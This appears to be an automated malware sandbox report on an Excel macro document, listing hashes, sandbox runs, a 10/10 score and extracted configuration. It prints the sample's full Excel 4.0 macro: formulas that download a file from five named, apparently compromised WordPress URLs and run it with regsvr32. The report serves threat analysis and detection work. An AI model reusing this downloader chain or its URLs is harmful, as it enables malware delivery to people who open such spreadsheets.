General
-
Target
91a89e29ceb93243c57923232c3931fbefa2b126ca599bac44a079a7500dd858
-
Size
91KB
-
Sample
241120-m8apxswfpk
-
MD5
e5cc30e8b27a574c39877aad42acaf64
-
SHA1
d519e91f26326a0a2be0c2b7bfce5e092da50b1f
-
SHA256
91a89e29ceb93243c57923232c3931fbefa2b126ca599bac44a079a7500dd858
-
SHA512
6bb573f31fd747a01ae72d627310418b8935fffb08faef938b97a382a628ca3e6b0eb5f0426cb33462dd99f1798ae73187dbe7a1962e35c63e2bb63ae47407dd
-
SSDEEP
1536:tdNlX2L2nyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0bIS:td32KyVEoBo6hKb4llGsQjbxXS
Behavioral task
behavioral1
Sample
91a89e29ceb93243c57923232c3931fbefa2b126ca599bac44a079a7500dd858.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
91a89e29ceb93243c57923232c3931fbefa2b126ca599bac44a079a7500dd858.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/
https://dev.subs2me.com/wp-includes/EMa/
https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/
https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/
https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/
-
formulas
=FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/","..\dw1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dev.subs2me.com/wp-includes/EMa/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dw1.ocx") =RETURN()
Extracted
https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/
https://dev.subs2me.com/wp-includes/EMa/
https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/
Targets
-
-
Target
91a89e29ceb93243c57923232c3931fbefa2b126ca599bac44a079a7500dd858
-
Size
91KB
-
MD5
e5cc30e8b27a574c39877aad42acaf64
-
SHA1
d519e91f26326a0a2be0c2b7bfce5e092da50b1f
-
SHA256
91a89e29ceb93243c57923232c3931fbefa2b126ca599bac44a079a7500dd858
-
SHA512
6bb573f31fd747a01ae72d627310418b8935fffb08faef938b97a382a628ca3e6b0eb5f0426cb33462dd99f1798ae73187dbe7a1962e35c63e2bb63ae47407dd
-
SSDEEP
1536:tdNlX2L2nyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0bIS:td32KyVEoBo6hKb4llGsQjbxXS
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-